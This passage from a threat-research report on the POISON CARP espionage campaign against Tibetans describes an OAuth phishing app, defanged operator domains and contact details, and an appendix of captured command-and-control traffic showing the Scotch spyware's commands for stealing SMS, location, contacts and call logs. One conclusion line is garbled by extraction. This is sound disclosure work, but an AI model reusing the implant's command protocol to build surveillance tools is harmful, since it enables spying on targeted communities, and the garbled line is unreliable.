application called Energy Mail that requests access to Gmail data (Figure 15). After subsequent clicks, the link simply redirected to a
legitimate Google login page. The second `bit.ly link served MOONSHINE, leading us to determine that these OAuth attacks are carried`
out by the same operator as the mobile exploitation activity.
-----
Figure 14: Two malicious links received by member of Tibetan Parliament.
When we visited `www.energy-mail[.]org in a web browser, we were presented with a decoy page for a mail app called “Energy Mail” that`
purported to be “a free email application with simple configuration and free customization” supporting “Gmail, Outlook, Hotmail, Yahoo, Tencent
business, Sina, Netease, and many more.” This decoy page may have been designed to convince someone vetting the OAuth app that it
served a legitimate purpose.
-----
Figure 15 : Authorization screen for the “Energy Mail” account phishing application.
We identified the following websites that appeared to be used by the same operator, based on similarity of decoy pages and by using Passive
DNS data from [RiskIQ:](https://community.riskiq.com/)
```
antmoving[.]online
beemail[.]online
bf[.]mk
energy-mail[.]org
gmailapp[.]me
izelense[.]com
mailanalysis[.]services
mailcontactanalysis[.]online
mailnotes[.]online
polarismail[.]services
rf[.]mk
walkingnote[.]online
```
Decoy pages and OAuth applications contained the following contact information:
```
antmoving.online@gmail.com
energymail.org@gmail.com
jameslewis199106@gmail.com
touchxun658@gmail.com
+852 65891393
```
We found the following WHOIS data shared among some of these sites:
```
e-mail: dashenqu832@outlook.com
e-mail: ornaments798@outlook.com
## 5. Conclusion
```
-----
O e o t e s g ca t d gs o ou a a ys s s t e co ect o bet ee O SO C a d t e ca pa g s epo ted by Goog e oject e o
and Volexity. Based on the use of the same iOS exploits and similar iOS spyware implant between POISON CARP and the campaign
described by Google Project Zero and server infrastructure connections with the Evil Eye campaign reported by Volexity, we determine that the
three campaigns were likely conducted by the same operator or a closely coordinated group of operators who share resources.
Beyond the technical overlap in these campaigns is the fact that they all targeted ethnic minority groups related to China: Uyghurs and
[Tibetans. These communities have experienced digital espionage threats for over a decade and previous](https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/) [reports often find the same operators](https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/)
and malware tool kits targeting them. However, the level of threat posed by POISON CARP and the linked campaigns are a game changer.
These campaigns are the first documented cases of iOS exploits and spyware being used against these communities.
Over the years, Tibetan groups have become savvy to the signs of suspicious emails, attachments, and phishing. However, POISON CARP
shows that mobile threats are not expected by the community, as evidenced by the high click rate on the exploit links that would have resulted
in significant compromise if the devices were running vulnerable versions of iOS or Android. Part of the success of the social engineering used
by POISON CARP is likely due to the effort made to make targeted individuals feel comfortable through the extended chat conversations and
fake personas. This intimate level of targeting is easier to achieve on mobile chat apps than through email.
The targeting of mobile platforms also reflects a general pattern we have seen in information security threats to civil society around the world.
[Numerous reports show the products of commercial spyware vendors who sell services exclusively to governments being used to spy on](https://citizenlab.ca/tag/nso-group/)
activists and journalists through their iOS and Android devices. These incidents demonstrate a growing demand for exploitation of mobile
devices. From an adversary perspective what drives this demand is clear. It is on mobile devices that we consolidate our online lives and that
civil society organizes and mobilizes. A view inside a phone can give a view inside these movements.
Addressing these threats requires action from within civil society and private industry. Efforts such as [TibCERT are important steps forward in](https://tibcert.org/)
increasing the digital security of Tibetan organisations and can serve as examples for other civil society communities. By adopting procedures,
norms, and frameworks used by government and private industry such as CERTs, civil society can mature efforts to share incident response
resources and data on threats. At the same time, platform providers should pay special attention to threats deployed against civil society. Not
only are civil society users at heightened risk of negative consequences from digital espionage, but the surveillance tools developed and
honed with the unwitting aid of civil society targets put all users at risk.
## Acknowledgements
This report is a collaboration with the Tibetan Computer Emergency Readiness Team (TibCERT). Special thanks to the TNG & Tommy.
## Indicators of Compromise
[Indicators of compromise are available on our GitHub page in multiple formats.](https://github.com/citizenlab/malware-indicators)
## Appendix A: MOONSHINE – Scotch Command and Control Traffic
The following is a rendered view of network communication we captured between our Android test device infected with the Scotch implant and
the command and control server. Data in italics denotes information which has been redacted.
-----
```
=================================================================================================
SERVER -> CLIENT : ONLINE | SUCCESS -> [{'target_id': }]
SERVER -> CLIENT : DEV_INFO | SUCCESS -> [{}]
CLIENT -> SERVER : DEV_INFO | SUCCESS ->
[{'board_name': 'unknown',
'cpu_corenum': 1,
'cpu_maxfreq': '',
'cpu_minfreq': '',
'cpu_curfreq': 'N/A',
'cpu_feature': 'swp half thumb fastmult vfp edsp neon
vfpv3 tls vfpv4 idiva idivt vfpd32 evtstrm',
'cpu_hardware': 'Dummy Virtual Machine',
'cpu_arch': '7',
'product': 'sdk_phone_armv7',
'model': 'sdk_phone_armv7',
'sdk': '6.0',
'sdk_int': 23,
'imei': '00000000000000',
'hardware': 'ranchu',
'radio_version': '',
'brand': 'Android',
'rom': 'unknown',
'system_version': '6.0',
'linux_version': 'Linux version 3.10.0+ (jinqian@jinqian.mtv.corp.google.com)
(gcc version 4.9 20150123 (prerelease) (GCC) )
#99 SMP PREEMPT Tue May 17 18:35:11 PDT 2016\nay 17 18:35:11 P',
'display': 'sdk_phone_armv7-userdebug 6.0 MASTER 3079352 test-keys',
'host': 'vpeb14.mtv.corp.google.com',
'language': 'en-US',
'host_app_label': 'Loader',
'host_app_version_name': '1.0',
'host_app_version_code': 1,
'host_app_package_name': 'com.facebook.katana',
'host_app_path': '/data/data/com.facebook.katana',
'real_resolution': '1440 * 2880',
'resolution': '1440 * 2712',
'densitydpi': 560,
'sensor': ['Goldfish 3-axis Accelerometer', 'Goldfish 3-axis Magnetic field sensor',
'Goldfish Orientation sensor', 'Goldfish Temperature sensor',
'Goldfish Proximity sensor', 'Goldfish Light sensor',
'Goldfish Pressure sensor', 'Goldfish Humidity sensor'],
'simcard': [],
'packageInfo': [
{'name': 'com android smoketest' 'version': '6 0 3079352' 'install time': 1469048094000}
```
-----
```
{'name': 'com.example.android.apis', 'version': '6.0-3079352', 'install_time': 1469048339000},
{'name': 'com.facebook.katana', 'version': '1.0', 'install_time': 1564653617080},
{'name': 'com.android.gesture.builder', 'version': '6.0-3079352', 'install_time': 1469048289000},
{'name': 'com.android.smoketest.tests', 'version': '6.0-3079352', 'install_time': 1469048094000},
{'name': 'com.example.android.softkeyboard', 'version': '6.0-3079352', 'install_time': 1469048288000},
{'name': 'com.android.widgetpreview', 'version': '6.0-3079352', 'install_time': 1469048289000}
]
}]
SERVER -> CLIENT : GET_PLUGIN_INFO | SUCCESS ->
[{'plugins':
[
{'name': 'bourbon.jar', 'version': '0.1.0708.39', 'hash': ''},
{'name': 'icecube.jar', 'version': '0.1.0708.39', 'hash': ''}
]
}]
CLIENT -> SERVER : GET_PLUGIN_INFO | SUCCESS -> []
SERVER -> CLIENT : GET_SMS | SUCCESS -> [{'subcmd': 2}]
CLIENT -> SERVER : GET_SMS | COMMAND_TYPE_NOT_REGISTERED -> []
SERVER -> CLIENT : GET_LOCATION | SUCCESS -> [{'subcmd': 2}]
CLIENT -> SERVER : GET_LOCATION | COMMAND_TYPE_NOT_REGISTERED -> []
SERVER -> CLIENT : GET_CONTACT | SUCCESS -> [{'subcmd': 2}]
CLIENT -> SERVER : GET_CONTACT | COMMAND_TYPE_NOT_REGISTERED -> []
SERVER -> CLIENT : GET_CALLLOG | SUCCESS -> [{'subcmd': 2}]
CLIENT -> SERVER : GET_CALLLOG | COMMAND_TYPE_NOT_REGISTERED -> []
CLIENT -> SERVER : GET_PLUGIN_INFO | SUCCESS -> []
SERVER -> CLIENT : GET_SMS | SUCCESS -> [{'subcmd': 2}]
SERVER -> CLIENT : GET_LOCATION | SUCCESS -> [{'subcmd': 2}]
SERVER -> CLIENT : GET_CONTACT | SUCCESS -> [{'subcmd': 2}]
SERVER -> CLIENT : GET_CALLLOG | SUCCESS -> [{'subcmd': 2}]
CLIENT -> SERVER : GET_SMS | PERMISION_NOT_GRANTED -> []
CLIENT -> SERVER : GET_LOCATION | PERMISION_NOT_GRANTED -> []
CLIENT -> SERVER : GET_CONTACT | PERMISION_NOT_GRANTED -> []
CLIENT -> SERVER : GET_CALLLOG | PERMISION_NOT_GRANTED -> []
```
1. In a statement released on September 6, 2019 Apple confirmed that the iOS campaign targeted Uyghur websites:
_[https://www.apple.com/newsroom/2019/09/a-message-about-ios-security/↩](https://www.apple.com/newsroom/2019/09/a-message-about-ios-security/)_
2. Kang credits Guang Gong (@oldfresher) of Qihoo 360 Alpha Team and Wen Xu (@antlr7) of KeenTeam for discovering the exploit.↩
## Media Mentions
[Reuters,](https://www.reuters.com/article/us-china-cyber-tibetans/chinese-hackers-who-pursued-uighurs-also-targeted-tibetans-researchers-idUSKBN1W90XN) [Vice,](https://www.vice.com/en_us/article/a357b5/hackers-tried-to-compromise-phones-of-tibetans-working-for-dalai-lama) [Forbes,](https://www.forbes.com/sites/thomasbrewster/2019/09/24/whatsapp-fakes-hack-tibetan-iphones-and-androids-to-steal-facebook-data-and-more/#31bc93a3713d) [Forbes Israel,](http://www.forbes.co.il/news/new.aspx?Pn6VQ=J&0r9VQ=EKEMH) [Forbes France,](https://www.forbes.fr/technologie/comment-les-chinois-hackent-les-smartphones-de-personnalites-tibetaines/) [TechCrunch,](https://techcrunch.com/2019/09/24/tibetans-iphone-android-hacks-uyghurs/) [Wired,](https://www.wired.com/story/doordash-breach-notpetya-fedex-security-roundup/) [Cyber Scoop,](https://www.cyberscoop.com/tibet-citizen-lab-spyware-espionage/) [Boing Boing,](https://boingboing.net/2019/09/24/one-click-attacks.html) [ICT Kommunikation,](https://ictk.ch/inhalt/chinesische-hacker-griffen-angeblich-exil-tibeter) [SC Media,](https://www.scmagazine.com/home/security-news/apts-cyberespionage/poison-carp-cyberespionage-group-targeting-tibetan-officials-with-mobile-malware/) the
Logic, [Business Insider,](https://www.businessinsider.in/the-iphones-and-android-phones-of-tibetan-activists-were-targeted-by-hackers-pretending-to-work-for-amnesty-international/articleshow/71281769.cms) [Information Security Newspaper,](https://www.securitynewspaper.com/2019/09/24/see-how-one-click-mobile-exploits-targets-tibetans/) [Satoshi Nakamoto Blog (2),](https://www.satoshinakamotoblog.com/1-click-iphone-and-android-exploits-target-tibetan-users-via-whatsapp) [Liberty Times Net,](https://news.ltn.com.tw/news/world/breakingnews/2925621) [Tibet Times,](http://tibettimes.net/2019/09/24/180568/) [Fooshya,](https://fooshya.com/2019/09/24/whatsapp-fakes-hack-tibetan-iphones-and-androids-to-steal-fb-knowledge-and-extra/) [Kursk Izvestia,](http://kursk-izvestia.ru/news/144198/)
[Boxun,](https://www.boxun.com/news/gb/china/2019/09/201909250737.shtml) [PC Mag,](https://au.pcmag.com/news/63650/iphone-hackers-who-spied-on-uighurs-also-targeted-tibetans) [Bald News,](https://www.bald-news.com/culture/8236639/%D8%A8%D9%86%D9%82%D8%B1%D8%A9-%D9%88%D8%A7%D8%AD%D8%AF%D8%A9-%D8%B9%D9%84%D9%89-%D9%88%D8%A7%D8%AA%D8%B3%D8%A7%D8%A8-%D9%87%D9%88%D8%A7%D8%AA%D9%81-%D8%A3%D9%86%D8%AF%D8%B1%D9%88%D9%8A%D8%AF-%D9%88%D8%A2%D9%8A%D9%81%D9%88%D9%86-%D8%AA%D8%AA%D8%B9%D8%B1%D8%B6-%D9%84%D9%84%D8%A7%D8%AE%D8%AA%D8%B1%D8%A7%D9%82) [Novost IT,](https://novostit.com/kiberprestupniki-atakovali-ofis-dalaj-lamy-s-pomoshhyu-ssylki-v-whatsapp.html) [Ars Technica,](https://arstechnica.com/information-technology/2019/09/attackers-used-one-click-exploits-to-target-tibetans-ios-and-android-phones/) [Next Web,](https://thenextweb.com/security/2019/09/25/mobile-malware-campaign-targeting-uyghur-muslims-impacted-tibetans-too/) [Koran Sindo,](http://koran-sindo.com/page/news/2019-09-26/0/26/Peretas_China_Targetkan_Warga_Tibet_dan_Uighur) [Web India,](https://news.webindia123.com/news/Articles/India/20190925/3605789.html) [Security Week,](https://www.securityweek.com/poison-carp-threat-actor-targets-tibetan-groups) [Big AZ,](https://big.az/369435-whatsapp_isledenlerin_nezerine_danisiq_ve_yazismalariniz_izlenile_biler.html) [Cyber Wire,](https://www.thecyberwire.com/issues/issues2019/September/CyberWire_2019_09_25.html) La Nouvelle
Tribune, [ZPN,](https://zpn.ro/hackerii-chinezi-care-au-urmarit-uigurii-au-vizat-si-tibetanii-cercetatori-securitate-software-telco-isp/) [Nieuw Space,](http://www.nieuw.space/post?id=5998043) [USA News Hub,](http://www.allusanewshub.com/2019/09/25/the-cybersecurity-202-white-house-blocking-congress-from-auditing-its-offensive-hacking-strategy/) [Live Door,](https://news.livedoor.com/article/detail/17137032/) [USA Science News,](https://usa-sciencenews.com/2019/09/25/inside-the-campaign-that-tried-to-compromise-tibetans-ios-and-android-phones/) [Security.nl,](https://www.security.nl/posting/625473/Tibetaanse+groepen+doelwit+van+1-click+Android-+en+iOS-exploits) [News Headline,](https://thenewsheadline.com/attackers-used-one-click-exploits-to-target-tibetans-ios-and-android-phones/) [PC News,](https://pcnews.ru/news/hakery_naucilis_vzlamyvat_smartfony_cerez_whatsapp-927113.html) [the Quint,](https://www.thequint.com/news/hot-news/chinese-hackers-target-tibetans-close-to-dalai-lama) [Mobi Guru,](https://mobiguru.ru/news/art/22570.html)
[News 18,](https://www.news18.com/news/tech/whatsapp-is-being-used-by-hackers-to-target-tibetans-2322789.html) [Boan News,](https://www.boannews.com/media/view.asp?idx=83259) [Austrian Economics Blog,](https://austrian.economicblogs.org/zerohedge/2019/durden-china-linked-hackers-targetnbsptibetan-activists-smartphones-spoofing-amnesty-international-officials/) [Phayul,](http://www.phayul.com/news/article.aspx?id=41796&article=Members+of+CTA%2c+civil+society+targeted+by+one-click+mobile+exploits%3a+research) [Foreign Policy,](https://foreignpolicy.com/2019/09/26/security-brief-plus-trading-missiles-for-favors/) [Defence Web,](https://www.defenceweb.co.za/cyber-defence/chinese-uighur-hackers-also-went-after-tibetans/) [VAR India,](https://www.varindia.com/news/oneclick-away-on-your-ios-and-android-phones-with-just-one-whatsapp-click) [Globo,](https://g1.globo.com/economia/tecnologia/blog/altieres-rohr/post/2019/09/27/com-link-via-whatsapp-hackers-espionaram-celulares-de-liderancas-do-tibete.ghtml) [App Marsh,](https://www.appmarsh.com/start-up-no-1154-ai-scientific-analysis-as-just-right-as-human-amazons-new-iot-protocol-5gs-warmth-drawback-wepaintings-objectives-to-promote-three-companies-and-extra/) [UDN,](https://udn.com/news/story/7331/4075392) [Maestroviejo,](https://maestroviejo.es/netizen-report-protestas-contra-la-corrupcion-en-egipto-desencadenan-bloqueos-de-internet-y-arrestos/)
[Daily Heralds](https://dailyheralds.org/market/doordash-breach-exposes-data-49-million-customers-84600420)
-----